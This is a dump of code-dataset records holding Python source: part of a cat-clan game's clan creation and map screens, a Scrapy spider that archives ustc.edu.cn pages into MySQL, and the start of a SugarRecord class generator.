draw(game.choose_cats[u],(700, 150))\n elif u == game.switches['members'][2]:\n draw(game.choose_cats[u],(700, 200))\n elif u == game.switches['members'][3]:\n draw(game.choose_cats[u],(700, 250))\n elif u == game.switches['members'][4]:\n draw(game.choose_cats[u],(700, 300))\n elif u == game.switches['members'][5]:\n draw(game.choose_cats[u],(700, 350))\n elif u == game.switches['members'][6]:\n draw(game.choose_cats[u],(700, 400))\n except IndexError:\n pass\n\n for u in range(6, 12):\n if game.switches['leader'] == u:\n draw(game.choose_cats[u],(650, 200))\n elif game.switches['deputy'] == u:\n draw(game.choose_cats[u],(650, 250))\n elif game.switches['medicine_cat'] == u:\n draw(game.choose_cats[u],(650, 300))\n elif u not in game.switches['members']:\n buttons.draw_button((100, 130 + 50 * (u - 6)),\n image=game.choose_cats[u].sprite,\n cat=u,\n hotkey=[2, u + 4])\n try:\n if u == game.switches['members'][0]:\n draw(game.choose_cats[u],(700, 100))\n elif u == game.switches['members'][1]:\n draw(game.choose_cats[u],(700, 150))\n elif u == game.switches['members'][2]:\n draw(game.choose_cats[u],(700, 200))\n elif u == game.switches['members'][3]:\n draw(game.choose_cats[u],(700, 250))\n elif u == game.switches['members'][4]:\n draw(game.choose_cats[u],(700, 300))\n elif u == game.switches['members'][5]:\n draw(game.choose_cats[u],(700, 350))\n elif u == game.switches['members'][6]:\n draw(game.choose_cats[u],(700, 400))\n except IndexError:\n pass\n\n if 12 > game.switches['cat'] >= 0 and game.switches['cat'] not in [\n game.switches['leader'], game.switches['deputy'],\n game.switches['medicine_cat']\n ] and game.switches['cat'] not in game.switches['members']:\n chosen_cat = game.choose_cats[game.switches['cat']]\n draw_large(chosen_cat, (270, 200))\n verdana.text(str(game.choose_cats[game.switches['cat']].name),\n ('center', 175))\n verdana_small.text(\n str(game.choose_cats[game.switches['cat']].gender), (440, 260))\n verdana_small.text(str(game.choose_cats[game.switches['cat']].age),\n (440, 275))\n verdana_small.text(\n str(game.choose_cats[game.switches['cat']].trait), (440, 290))\n if len(game.switches['members']) < 7:\n buttons.draw_image_button((353, 360),\n button_name='recruit',\n text='Recruit',\n members=game.switches['cat'],\n add=True,\n size=(95, 30),\n hotkey=[1])\n\n\n\n # Would be nice to make this button remove the last added member rather than all the members\n buttons.draw_image_button((253, 400),\n button_name='last_step',\n text='< Last step',\n medicine_cat=None,\n members=[],\n cat=None,\n hotkey=[0],\n size=(147, 30)\n )\n\n if 0 == len(game.switches['members']):\n clan_none_img = image_cache.load_image(\n 'resources/images/pick_clan_screen/clan_none_light.png').convert_alpha()\n screen.blit(clan_none_img, (0, 414))\n elif 1 == len(game.switches['members']):\n clan_one_img = image_cache.load_image(\n 'resources/images/pick_clan_screen/clan_one_light.png').convert_alpha()\n screen.blit(clan_one_img, (0, 414))\n elif 2 == len(game.switches['members']):\n clan_two_img = image_cache.load_image(\n 'resources/images/pick_clan_screen/clan_two_light.png').convert_alpha()\n screen.blit(clan_two_img, (0, 414))\n elif 3 == len(game.switches['members']):\n clan_three_img = image_cache.load_image(\n 'resources/images/pick_clan_screen/clan_three_light.png').convert_alpha()\n screen.blit(clan_three_img, (0, 414))\n elif 3 < len(game.switches['members']) < 7:\n clan_four_img = image_cache.load_image(\n 'resources/images/pick_clan_screen/clan_four_light.png').convert_alpha()\n screen.blit(clan_four_img, (0, 414))\n elif 7 == len(game.switches['members']):\n clan_full_img = image_cache.load_image(\n 'resources/images/pick_clan_screen/clan_full_light.png').convert_alpha()\n screen.blit(clan_full_img, (0, 414))\n\n\n if 3 < len(game.switches['members']) < 8:\n buttons.draw_image_button((400, 400),\n button_name='next_step',\n text='Next Step',\n choosing_camp=True,\n biome='forest',\n camp_bg='camp1',\n hotkey=[2],\n size=(147, 30)\n )\n else:\n buttons.draw_image_button((400, 400),\n button_name='next_step',\n text='Next Step',\n available=False,\n size=(147, 30),\n hotkey=[2]\n )\n\n def sixth_phase(self):\n if map_available:\n for y in range(44):\n for x in range(40):\n noise_value = self.world.check_noise_tile(x, y)\n if noise_value > 0.1:\n #buttons.draw_maptile_button((x*TILESIZE,y*TILESIZE),image=(pygame.transform.scale(terrain.images[1],(TILESIZE,TILESIZE))))\n buttons.draw_button((x * 16, y * 16),\n image=pygame.transform.scale(\n tiles.sprites['terrain1'],\n (16, 16)),\n map_selection=(x, y))\n game.map_info[(x, y)] = [\n x, y, \"Desert\", \"Unclaimed\",\n 'Twoleg Activity: ' + choice([\n 'none', 'low', 'low', 'medium', 'medium',\n 'high'\n ]), 'Thunderpath Traffic: ' +\n choice(['none', 'low', 'medium', 'high']),\n 'Prey Levels: ' +\n choice(['none', 'low', 'medium']),\n 'Plant Cover: ' +\n choice(['none', 'low', 'medium'])\n ]\n elif noise_value < -0.015:\n buttons.draw_button((x * 16, y * 16),\n image=pygame.transform.scale(\n tiles.sprites['terrain3'],\n (16, 16)),\n map_selection=(x, y))\n game.map_info[(x, y)] = [\n x, y, \"Forest\", \"Unclaimed\",\n 'Twoleg Activity: ' + choice(\n ['none', 'low', 'low', 'medium', 'high']),\n 'Thunderpath Traffic: ' +\n choice(['none', 'low', 'medium']),\n 'Prey Levels: ' +\n choice(['low', 'medium', 'high']),\n 'Plant Cover: ' +\n choice(['low', 'medium', 'high'])\n ]\n else:\n buttons.draw_button((x * 16, y * 16),\n image=pygame.transform.scale(\n tiles.sprites['terrain0'],\n (16, 16)),\n map_selection=(x, y))\n game.map_info[(x, y)] = [\n x, y, \"Plains\", \"Unclaimed\",\n 'Twoleg Activity: ' + choice([\n 'none', 'low', 'medium', 'medium', 'high',\n 'high'\n ]), 'Thunderpath Traffic: ' +\n choice(['none', 'low', 'medium', 'high']),\n 'Prey Levels: ' +\n choice(['low', 'medium', 'high']),\n 'Plant Cover: ' +\n choice(['low', 'medium', 'high'])\n ]\n for y in range(44):\n for x in range(40):\n height = self.world.check_heighttile(x, y)\n if height < 0:\n buttons.draw_button((x * 16, y * 16),\n image=pygame.transform.scale(\n tiles.sprites['terrain2'],\n (16, 16)),\n map_selection=(x, y))\n game.map_info[(x, y)] = [\n x, y, \"Ocean\", \"Unclaimable\",\n 'Twoleg Activity: ' + choice(['none']),\n 'Thunderpath Traffic: ' + choice(['none']),\n 'Prey Levels: ' + choice(['none']),\n 'Plant Cover: ' + choice(['none'])\n ]\n elif x == 0:\n buttons.draw_button((x * 16, y * 16),\n image=pygame.transform.scale(\n tiles.sprites['terrain2'],\n (16, 16)),\n map_selection=(x, y))\n game.map_info[(x, y)] = [\n x, y, \"Ocean\", \"Unclaimable\",\n 'Twoleg Activity: ' + choice(['none']),\n 'Thunderpath Traffic: ' + choice(['none']),\n 'Prey Levels: ' + choice(['none']),\n 'Plant Cover: ' + choice(['none'])\n ]\n elif x == 39:\n buttons.draw_button((x * 16, y * 16),\n image=pygame.transform.scale(\n tiles.sprites['terrain2'],\n (16, 16)),\n map_selection=(x, y))\n game.map_info[(x, y)] = [\n x, y, \"Ocean\", \"Unclaimable\",\n 'Twoleg Activity: ' + choice(['none']),\n 'Thunderpath Traffic: ' + choice(['none']),\n 'Prey Levels: ' + choice(['none']),\n 'Plant Cover: ' + choice(['none'])\n ]\n elif y == 0:\n buttons.draw_button((x * 16, y * 16),\n image=pygame.transform.scale(\n tiles.sprites['terrain2'],\n (16, 16)),\n map_selection=(x, y))\n game.map_info[(x, y)] = [\n x, y, \"Ocean\", \"Unclaimable\",\n 'Twoleg Activity: ' + choice(['none']),\n 'Thunderpath Traffic: ' + choice(['none']),\n 'Prey Levels: ' + choice(['none']),\n 'Plant Cover: ' + choice(['none'])\n ]\n elif y == 43:\n buttons.draw_button((x * 16, y * 16),\n image=pygame.transform.scale(\n tiles.sprites['terrain2'],\n (16, 16)),\n map_selection=(x, y))\n game.map_info[(x, y)] = [\n x, y, \"Ocean\", \"Unclaimable\",\n 'Twoleg Activity: ' + choice(['none']),\n 'Thunderpath Traffic: ' + choice(['none']),\n 'Prey Levels: ' + choice(['none']),\n 'Plant Cover: ' + choice(['none'])\n ]\n elif height < 0.03:\n buttons.draw_button((x * 16, y * 16),\n image=pygame.transform.scale(\n tiles.sprites['terrain6'],\n (16, 16)),\n map_selection=(x, y))\n game.map_info[(x, y)] = [\n x, y, \"Beach\", \"Unclaimed\",\n 'Twoleg Activity: ' + choice([\n 'none', 'low', 'medium', 'medium', 'high',\n 'high'\n ]), 'Thunderpath Traffic: ' +\n choice(['none', 'low', 'medium']),\n 'Prey Levels: ' +\n choice(['low', 'medium', 'high']),\n 'Plant Cover: ' +\n choice(['none', 'low', 'medium'])\n ]\n elif height > 0.35:\n buttons.draw_button((x * 16, y * 16),\n image=pygame.transform.scale(\n tiles.sprites['terrain5'],\n (16, 16)),\n map_selection=(x, y))\n game.map_info[(x, y)] = [\n x, y, \"Mountainous\", \"Unclaimed\",\n 'Twoleg Activity: ' + choice([\n 'none', 'none', 'low', 'low', 'medium', 'high'\n ]), 'Thunderpath Traffic: ' + choice([\n 'none', 'none', 'low', 'low', 'medium',\n 'medium', 'high'\n ]), 'Prey Levels: ' +\n choice(['none', 'low', 'medium', 'high']),\n 'Plant Cover: ' +\n choice(['none', 'low', 'medium', 'high'])\n ]\n if (x, y) == game.switches['map_selection']:\n buttons.draw_button((x * 16, y * 16),\n image=pygame.transform.scale(\n tiles.sprites['terraintwo0'],\n (16, 16)),\n camp_site=(x, y))\n verdana_big.text('Map', (-16, 50))\n verdana.text(\n str(game.map_info[game.switches['map_selection']][0]) + \", \" +\n str(game.map_info[game.switches['map_selection']][1]),\n (-16, 100))\n verdana.text(str(game.map_info[game.switches['map_selection']][2]),\n (-16, 150))\n verdana.text(str(game.map_info[game.switches['map_selection']][3]),\n (-16, 200))\n verdana.text(str(game.switches['camp_site']), (-16, 250))\n\n if game.map_info[game.switches['map_selection']][3] == 'Unclaimed':\n\n # ensures a camp bg is chosen\n random_camp_options = ['camp1', 'camp2']\n random_camp = choice(random_camp_options)\n\n buttons.draw_button(\n (-16, 300),\n text='Done',\n choosing_camp=False,\n biome=game.map_info[game.switches['map_selection']][2],\n world_seed=self.worldseed,\n camp_bg = random_camp,\n cur_screen='clan created screen')\n\n else:\n buttons.draw_button((-16, 300),\n text='Done',\n available=False)\n else:\n self.choose_camp()\n\n def choose_camp(self):\n # MAIN AND BACK BUTTONS\n draw_main_menu(self)\n\n buttons.draw_image_button((253, 645),\n button_name='last_step',\n text='< Last step',\n choosing_camp=False,\n hotkey=[0],\n size=(147, 30)\n )\n\n # BIOME BUTTONS\n buttons.draw_image_button((196, 100),\n button_name='forest',\n text='Forest',\n biome='Forest',\n camp_bg='camp1',\n available=game.switches['biome'] != 'Forest',\n size=(100, 46),\n hotkey=[1])\n buttons.draw_image_button((304, 100),\n button_name='mountain',\n text='Mountainous',\n biome='Mountainous',\n camp_bg='camp1',\n available=game.switches['biome'] != 'Mountainous',\n size=(106, 46),\n hotkey=[2])\n buttons.draw_image_button((424, 100),\n button_name='plains',\n text='Plains',\n biome='Plains',\n camp_bg='camp1',\n available=game.switches['biome'] != 'Plains',\n size=(88, 46),\n hotkey=[3])\n buttons.draw_image_button((520, 100),\n button_name='beach',\n text='Beach',\n biome='Beach',\n camp_bg='camp1',\n available=game.switches['biome'] != 'Beach',\n size=(82, 46),\n hotkey=[4])\n\n # CHOOSING CAMP ART\n self.camp_art()\n if game.settings['backgrounds']:\n\n buttons.draw_image_button((400, 645),\n button_name='done_creation',\n text='Next Step',\n available=game.switches['camp_bg'] is not None,\n cur_screen='clan created screen',\n size=(147, 30)\n )\n\n if game.switches['biome'] == 'Forest':\n buttons.draw_image_button((95, 180),\n button_name='classic_camp',\n text='Classic',\n camp_bg='camp1',\n size=(154, 30),\n available=game.switches['camp_bg'] != 'camp1'\n )\n buttons.draw_image_button((108, 215),\n button_name='gully_camp',\n text='Gully',\n camp_bg='camp2',\n size=(154, 30),\n available=game.switches['camp_bg'] != 'camp2'\n )\n\n if game.switches['camp_bg'] == 'camp1':\n screen.blit(self.camp1, (175, 170))\n elif game.switches['camp_bg'] == 'camp2':\n screen.blit(self.camp2, (175, 170))\n\n elif game.switches['biome'] == 'Mountainous':\n buttons.draw_image_button((111, 180),\n button_name='cliff_camp',\n text='Cliff',\n camp_bg='camp1',\n size=(154, 30),\n available=game.switches['camp_bg'] != 'camp1')\n buttons.draw_image_button((101, 215),\n button_name='cave_camp',\n text='Caves',\n camp_bg='camp2',\n size=(154, 30),\n available=game.switches['camp_bg'] != 'camp2')\n\n if game.switches['camp_bg'] == 'camp1':\n screen.blit(self.camp1, (175, 170))\n elif game.switches['camp_bg'] == 'camp2':\n screen.blit(self.camp2, (175, 170))\n\n elif game.switches['biome'] == 'Plains':\n buttons.draw_image_button((64, 180),\n button_name='grasslands_camp',\n text='Grasslands',\n camp_bg='camp1',\n size=(154, 30),\n available=game.switches['camp_bg'] != 'camp1'\n )\n buttons.draw_image_button((89, 215),\n button_name='tunnel_camp',\n text='Tunnels',\n camp_bg='camp2',\n size=(154, 30),\n available=game.switches['camp_bg'] != 'camp2'\n )\n\n if game.switches['camp_bg'] == 'camp1':\n screen.blit(self.camp1, (175, 170))\n elif game.switches['camp_bg'] == 'camp2':\n screen.blit(self.camp2, (175, 170))\n\n elif game.switches['biome'] == 'Beach':\n buttons.draw_image_button((76, 180),\n button_name='tidepool_camp',\n text='Tidepools',\n camp_bg='camp1',\n size=(154, 30),\n available=game.switches['camp_bg'] != 'camp1')\n buttons.draw_image_button((65, 215),\n button_name='tidal_cave_camp',\n text='Tidal Cave',\n camp_bg='camp2',\n size=(154, 30),\n available=game.switches['camp_bg'] != 'camp2')\n if game.switches['camp_bg'] == 'camp1':\n screen.blit(self.camp1, (175, 170))\n elif game.switches['camp_bg'] == 'camp2':\n screen.blit(self.camp2, (175, 170))\n\n # PREVIEW BORDER\n screen.blit(MakeClanScreen.bg_preview_border, (167, 162))\n\n # CHOOSE RANDOM CAMP\n random_biome_options = ['Forest', 'Mountainous', 'Plains', 'Beach']\n random_biome = choice(random_biome_options)\n random_camp_options = ['camp1', 'camp2']\n random_camp = choice(random_camp_options)\n buttons.draw_image_button((255, 595),\n button_name='random_bg',\n text='Choose Random Camp Background',\n biome=random_biome,\n camp_bg=random_camp,\n available=True,\n size=(290, 30),\n cur_screen='clan created screen')\n\n else:\n buttons.draw_image_button((400, 645),\n button_name='done_creation',\n text='Next Step',\n available=game.switches['biome'] is not None,\n cur_screen='clan created screen',\n size=(147, 30)\n )\n\n def camp_art(self):\n camp_bg_base_dir = \"resources/images/camp_bg/\"\n start_leave = \"newleaf\"\n light_dark = \"light\"\n if game.settings[\"dark mode\"]:\n light_dark = \"dark\"\n\n available_biome = ['Forest', 'Mountainous', 'Plains', 'Beach']\n biome = game.switches['biome']\n if biome not in available_biome:\n biome = available_biome[0]\n biome = biome.lower()\n\n camp_bg_path_1 = f'{camp_bg_base_dir}/{biome}/{start_leave}_camp1_{light_dark}.png'\n camp_bg_path_2 = f'{camp_bg_base_dir}/{biome}/{start_leave}_camp2_{light_dark}.png'\n self.change_camp_art(camp_bg_path_1,camp_bg_path_2)\n\n def change_camp_art(self, arg0, arg1):\n self.camp1 = pygame.transform.scale(\n image_cache.load_image(arg0).convert(), (450, 400))\n self.camp2 = pygame.transform.scale(\n image_cache.load_image(arg1).convert(), (450, 400))\n\n\n def on_use(self):\n\n if game.switches['set_game_mode'] is False:\n self.game_mode()\n elif len(game.switches['clan_name']) == 0 and game.switches['set_game_mode'] is True:\n self.first_phase()\n elif len(game.switches['clan_name']\n ) > 0 and game.switches['leader'] is None:\n self.second_phase()\n elif game.switches[\n 'leader'] is not None and game.switches['deputy'] is None:\n Clan.leader_lives = 9\n self.third_phase()\n elif game.switches['leader'] is not None and game.switches[\n 'medicine_cat'] is None:\n self.fourth_phase()\n elif game.switches['medicine_cat'] is not None and game.switches[\n 'choosing_camp'] is False:\n self.fifth_phase()\n elif len(game.switches['members']) != 0:\n self.sixth_phase()\n else:\n self.first_phase()\n\n def screen_switches(self):\n game.switches['game_mode'] = None\n game.switches['clan_name'] = ''\n game.switches['leader'] = None\n game.switches['cat'] = None\n game.switches['medicine_cat'] = None\n game.switches['deputy'] = None\n game.switches['members'] = []\n game.switches['choosing_camp'] = False\n game.switches['roll_count'] = 0\n create_example_cats()\n self.worldseed = randrange(10000)\n #if map_available:\n # self.world = World((44, 44), self.worldseed)\n\nclass ClanCreatedScreen(Screens):\n\n def on_use(self):\n # LAYOUT\n verdana.text('Your clan has been created and saved!', ('center', 50))\n draw_big(game.clan.leader,(screen_x / 2 - 50, 100))\n\n # buttons\n buttons.draw_image_button((349, 250),\n button_name='continue_small',\n text='Continue',\n cur_screen='clan screen',\n size=(102, 30),\n hotkey=[1])\n\n def screen_switches(self):\n game.clan = Clan(game.switches['clan_name'],\n game.choose_cats[game.switches['leader']],\n game.choose_cats[game.switches['deputy']],\n game.choose_cats[game.switches['medicine_cat']],\n game.switches['biome'], game.switches['world_seed'],\n game.switches['camp_site'], game.switches['camp_bg'],\n game.switches['game_mode'])\n game.clan.create_clan()\n if map_available:\n territory_claim = str(game.clan.name) + 'Clan Territory'\n otherclan_campsite = {}\n for clan in game.clan.all_clans:\n x = randrange(40)\n y = randrange(44)\n clan_camp = self.choose_other_clan_territory(x, y)\n territory_biome = str(game.map_info[clan_camp][2])\n territory_twolegs = str(game.map_info[clan_camp][4])\n territory_thunderpath = str(game.map_info[clan_camp][5])\n territory_prey = str(game.map_info[clan_camp][6])\n territory_plants = str(game.map_info[clan_camp][7])\n game.map_info[clan_camp] = [\n clan_camp[0], clan_camp[1], territory_biome,\n str(clan) + \" Camp\", territory_twolegs,\n territory_thunderpath, territory_prey, territory_plants\n ]\n otherclan_campsite[str(clan)] = clan_camp\n for y in range(44):\n for x in range(40):\n if (x, y) == (game.switches['camp_site'][0] - 1,\n game.switches['camp_site'][1]):\n territory_biome = str(game.map_info[(x, y)][2])\n territory_twolegs = str(game.map_info[(x, y)][4])\n territory_thunderpath = str(game.map_info[(x, y)][5])\n territory_prey = str(game.map_info[(x, y)][6])\n territory_plants = str(game.map_info[(x, y)][7])\n if str(game.map_info[(x, y)][3]) != 'Unclaimable':\n game.map_info[(x, y)] = [\n x, y, territory_biome, territory_claim,\n territory_twolegs, territory_thunderpath,\n territory_prey, territory_plants\n ]\n elif (x, y) == (game.switches['camp_site'][0],\n game.switches['camp_site'][1] - 1):\n territory_biome = str(game.map_info[(x, y)][2])\n territory_twolegs = str(game.map_info[(x, y)][4])\n territory_thunderpath = str(game.map_info[(x, y)][5])\n territory_prey = str(game.map_info[(x, y)][6])\n territory_plants = str(game.map_info[(x, y)][7])\n if str(game.map_info[(x, y)][3]) != 'Unclaimable':\n game.map_info[(x, y)] = [\n x, y, territory_biome, territory_claim,\n territory_twolegs, territory_thunderpath,\n territory_prey, territory_plants\n ]\n elif (x, y) == (game.switches['camp_site'][0] + 1,\n game.switches['camp_site'][1]):\n territory_biome = str(game.map_info[(x, y)][2])\n territory_twolegs = str(game.map_info[(x, y)][4])\n territory_thunderpath = str(game.map_info[(x, y)][5])\n territory_prey = str(game.map_info[(x, y)][6])\n territory_plants = str(game.map_info[(x, y)][7])\n if str(game.map_info[(x, y)][3]) != 'Unclaimable':\n game.map_info[(x, y)] = [\n x, y, territory_biome, territory_claim,\n territory_twolegs, territory_thunderpath,\n territory_prey, territory_plants\n ]\n elif (x, y) == (game.switches['camp_site'][0],\n game.switches['camp_site'][1] + 1):\n territory_biome = str(game.map_info[(x, y)][2])\n territory_twolegs = str(game.map_info[(x, y)][4])\n territory_thunderpath = str(game.map_info[(x, y)][5])\n territory_prey = str(game.map_info[(x, y)][6])\n territory_plants = str(game.map_info[(x, y)][7])\n if str(game.map_info[(x, y)][3]) != 'Unclaimable':\n game.map_info[(x, y)] = [\n x, y, territory_biome, territory_claim,\n territory_twolegs, territory_thunderpath,\n territory_prey, territory_plants\n ]\n for clan in game.clan.all_clans:\n if (x, y) == (otherclan_campsite[str(clan)][0] - 1,\n otherclan_campsite[str(clan)][1]):\n territory_biome = str(game.map_info[(x, y)][2])\n territory_twolegs = str(game.map_info[(x, y)][4])\n territory_thunderpath = str(game.map_info[(x,\n y)][5])\n territory_prey = str(game.map_info[(x, y)][6])\n territory_plants = str(game.map_info[(x, y)][7])\n if str(game.map_info[(x, y)][3]) != 'Unclaimable':\n game.map_info[(x, y)] = [\n x, y, territory_biome,\n str(clan) + ' Territory',\n territory_twolegs, territory_thunderpath,\n territory_prey, territory_plants\n ]\n elif (x, y) == (otherclan_campsite[str(clan)][0],\n otherclan_campsite[str(clan)][1] - 1):\n territory_biome = str(game.map_info[(x, y)][2])\n territory_twolegs = str(game.map_info[(x, y)][4])\n territory_thunderpath = str(game.map_info[(x,\n y)][5])\n territory_prey = str(game.map_info[(x, y)][6])\n territory_plants = str(game.map_info[(x, y)][7])\n if str(game.map_info[(x, y)][3]) != 'Unclaimable':\n game.map_info[(x, y)] = [\n x, y, territory_biome,\n str(clan) + ' Territory',\n territory_twolegs, territory_thunderpath,\n territory_prey, territory_plants\n ]\n elif (x, y) == (otherclan_campsite[str(clan)][0] + 1,\n otherclan_campsite[str(clan)][1]):\n territory_biome = str(game.map_info[(x, y)][2])\n territory_twolegs = str(game.map_info[(x, y)][4])\n territory_thunderpath = str(game.map_info[(x,\n y)][5])\n territory_prey = str(game.map_info[(x, y)][6])\n territory_plants = str(game.map_info[(x, y)][7])\n if str(game.map_info[(x, y)][3]) != 'Unclaimable':\n game.map_info[(x, y)] = [\n x, y, territory_biome,\n str(clan) + ' Territory',\n territory_twolegs, territory_thunderpath,\n territory_prey, territory_plants\n ]\n elif (x, y) == (otherclan_campsite[str(clan)][0],\n otherclan_campsite[str(clan)][1] + 1):\n territory_biome = str(game.map_info[(x, y)][2])\n territory_twolegs = str(game.map_info[(x, y)][4])\n territory_thunderpath = str(game.map_info[(x,\n y)][5])\n territory_prey = str(game.map_info[(x, y)][6])\n territory_plants = str(game.map_info[(x, y)][7])\n if str(game.map_info[(x, y)][3]) != 'Unclaimable':\n game.map_info[(x, y)] = [\n x, y, territory_biome,\n str(clan) + ' Territory',\n territory_twolegs, territory_thunderpath,\n territory_prey, territory_plants\n ]\n #save_map(game.map_info, game.switches['clan_name'])\n\n def choose_other_clan_territory(self, x, y):\n self.x = x\n self.y = y\n if game.map_info[(self.x, self.y)][3] != \"Unclaimed\":\n self.x = randrange(40)\n self.y = randrange(44)\n if game.map_info[(self.x, self.y)][3] == \"Unclaimed\":\n return self.x, self.y\n else:\n self.x = randrange(40)\n self.y = randrange(44)\n return self.x, self.y\n else:\n return self.x, self.y\n\n","repo_name":"16ar0Wow/16ar0s-modded-clangen","sub_path":"16ar0s-modded-clangen/scripts/screens/clan_creation_screens.py","file_name":"clan_creation_screens.py","file_ext":"py","file_size_in_byte":62950,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"6244163382","text":"import scrapy\nimport re\nimport pymysql\nimport datetime \nfrom scrapy.exceptions import IgnoreRequest\nimport logging\n\nbase_domain = 'ustc.edu.cn'\nmax_webpages_per_domain = 50000\n\nmysql_db = 'spider_ustc'\nmysql_host = 'localhost'\nmysql_user = 'spider'\nmysql_password = 'chatgpt-ustc-spider'\nmysql_table = 'webpages'\n\ndb_conn = pymysql.connect(host=mysql_host, user=mysql_user, password=mysql_password, database=mysql_db, cursorclass=pymysql.cursors.DictCursor)\nif not db_conn:\n print('database connection failed')\n\nglobal_page_count = dict()\nwith db_conn.cursor() as cursor:\n cursor.execute(\"SELECT * FROM domain_count\")\n domain_counts = cursor.fetchall()\n for domain_count in domain_counts:\n global_page_count[domain_count['domain']] = domain_count['page_count']\n\n\ndef save_webpage(response, utf8_body):\n with db_conn.cursor() as cursor:\n curr_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n sql = \"INSERT INTO \" + mysql_table + \" (url, data, content_type, domain, crawl_time) VALUES (%s, %s, %s, %s, %s)\"\n try:\n content_type_header = response.headers.get('content-type', None)\n domain = response.url.split('/')[2].lower()\n cursor.execute(sql, (response.url, utf8_body, content_type_header, domain, curr_time))\n\n # update per-domain page count\n if domain not in global_page_count:\n global_page_count[domain] = 1\n sql = \"INSERT INTO domain_count (page_count, domain) VALUES (%s, %s)\"\n else:\n global_page_count[domain] += 1\n sql = \"UPDATE domain_count SET page_count = %s WHERE domain = %s\"\n cursor.execute(sql, (global_page_count[domain], domain))\n db_conn.commit()\n except Exception as e:\n print('Failed to save to database: ' + str(e))\n return {'url': response.url, 'time': curr_time }\n return None\n\n\nclass FilterResponses(object):\n @staticmethod\n def is_valid_response(type_whitelist, content_type_header):\n for type_regex in type_whitelist:\n if re.search(type_regex, content_type_header):\n return True\n return False\n\n def process_response(self, request, response, spider):\n #type_whitelist = (r'text/', r'application/pdf', r'application/msword', r'officedocument', r'application/vnd.ms-powerpoint', r'openxmlformats')\n type_whitelist = (r'text/', )\n content_type_header = response.headers.get('content-type', None)\n if not content_type_header:\n return response\n content_type_header = content_type_header.decode()\n if self.is_valid_response(type_whitelist, content_type_header):\n return response\n else:\n msg = \"Ignoring request {}, content-type {} was not in whitelist\".format(response.url, content_type_header)\n logging.log(logging.INFO, msg)\n raise IgnoreRequest()\n\n\nclass FilterRequests(object):\n @staticmethod\n def should_crawl(url):\n # check if the URL is valid\n if not url.startswith('http://') and not url.startswith('https://'):\n return False\n # check whether the URL is in a subdomain of the target website\n url_lowercase = url.lower()\n domain = url_lowercase.split('/')[2]\n if not re.match('([a-z0-9.-]+\\.)?' + base_domain.replace('.', '\\.'), domain):\n return False\n # skip URLs in certain domains\n skip_domains = ('mirrors.ustc.edu.cn', 'git.lug.ustc.edu.cn', 'cicpi.ustc.edu.cn')\n if domain in skip_domains:\n return False\n skip_subdomains = ('lib.ustc.edu.cn', )\n for match_domain in skip_subdomains:\n if re.match('.*' + match_domain.replace('.', '\\.'), domain):\n return False\n # avoid URLs that are too long\n if len(url) > 512:\n return False\n # check whether it is an image\n for suffix in ('jpg', 'jpeg', 'png', 'gif'):\n if url_lowercase.endswith('.' + suffix):\n return False\n # check if we have crawled too many pages in the domain\n if domain in global_page_count and global_page_count[domain] >= max_webpages_per_domain:\n return False\n return True\n\n @staticmethod\n def has_crawled(url):\n # check whether the URL has been crawled\n with db_conn.cursor() as cursor:\n sql = \"SELECT crawl_time FROM \" + mysql_table + \" WHERE url = %s\"\n cursor.execute(sql, (url,))\n if cursor.fetchone():\n return True\n return False\n\n @staticmethod\n def insert_skipped_url(url):\n with db_conn.cursor() as cursor:\n curr_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n try:\n domain = url.split('/')[2].lower()\n except:\n domain = None\n sql = \"INSERT INTO skipped_urls (url, domain, crawl_time) VALUES (%s, %s, %s)\"\n try:\n cursor.execute(sql, (url, domain, curr_time))\n db_conn.commit()\n except: # failed insertions may be duplicates\n pass\n\n def process_request(self, request, spider):\n if self.should_crawl(request.url):\n if not self.has_crawled(request.url):\n return None # begin crawl\n else:\n raise IgnoreRequest() # has been crawled, skip sliently\n else: # an URL that should not be crawled\n self.insert_skipped_url(request.url)\n raise IgnoreRequest()\n\n\nclass USTCSpider(scrapy.Spider):\n name = 'ustc-spider'\n start_urls = ['https://' + base_domain + '/']\n\n custom_settings = {\n 'DOWNLOADER_MIDDLEWARES': {\n 'spider.FilterResponses': 999,\n 'spider.FilterRequests': 998\n },\n 'DOWNLOAD_MAXSIZE': 8 * 1024 * 1024,\n 'DOWNLOAD_TIMEOUT': 10,\n 'CONCURRENT_REQUESTS_PER_DOMAIN': 32,\n 'CONCURRENT_REQUESTS': 32,\n 'DEPTH_PRIORITY': 1,\n 'SCHEDULER_DISK_QUEUE': 'scrapy.squeues.PickleFifoDiskQueue',\n 'SCHEDULER_MEMORY_QUEUE': 'scrapy.squeues.FifoMemoryQueue'\n }\n\n def parse(self, response):\n content_type = response.headers.get('content-type', None)\n if content_type:\n content_type = content_type.decode().lower()\n if 'gb2312' in content_type:\n utf8_body = response.body.decode('gb2312').encode('utf-8')\n elif 'gbk' in content_type:\n utf8_body = response.body.decode('gbk').encode('utf-8')\n else:\n utf8_body = response.body\n\n yield save_webpage(response, utf8_body)\n\n if content_type.startswith('text/'):\n for next_page in response.css('a::attr(href)'):\n yield response.follow(next_page, callback=self.parse)\n","repo_name":"bojieli/chatgpt-playground","sub_path":"spider/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":6874,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"34639754898","text":"__author__ = 'dave'\nimport json\n\nclass SugarClassCreator(object):\n def __init__(self, json_for_remote_object):\n self.param_dict = json.loads(json_for_remote_object)\n\n def make_property_specs(self, prop_dict):\n property_specs = list()\n\n for key in prop_dict.keys():\n prop_name = key\n prop_value = prop_dict[key]\n type_of_prop = type(prop_value)\n if type_of_prop is dict:\n android_type = 'Class'\n elif type_of_prop is list:\n android_type = 'Array'\n elif type_of_prop is unicode:\n android_type = 'String'\n elif type_of_prop is int:\n android_type = 'int'\n elif type_of_prop is float:\n android_type = 'float'\n android_prop_def = {'name':prop_name, 'type':android_type}\n property_specs.append(android_prop_def)\n return property_specs\n\n def make_android_class_declaration(self, class_name):\n cased_class_name = class_name.title()\n new_android_class_text = 'public class ' + cased_class_name + ' extends SugarRecord<' + cased_class_name + '> {\\n'\n return new_android_class_text\n\n def make_android_prop_declaration(self, android_prop_def, is_array=False):\n if is_array:\n prop_type = android_prop_def['type'] + '[]'\n else:\n prop_type = android_prop_def['type']\n prop_declaration = prop_type + ' ' + android_prop_def['name'].title() + ';'\n return prop_declaration\n\n def make_android_class_prop_declaration(self, android_class_name, is_array=False):\n if 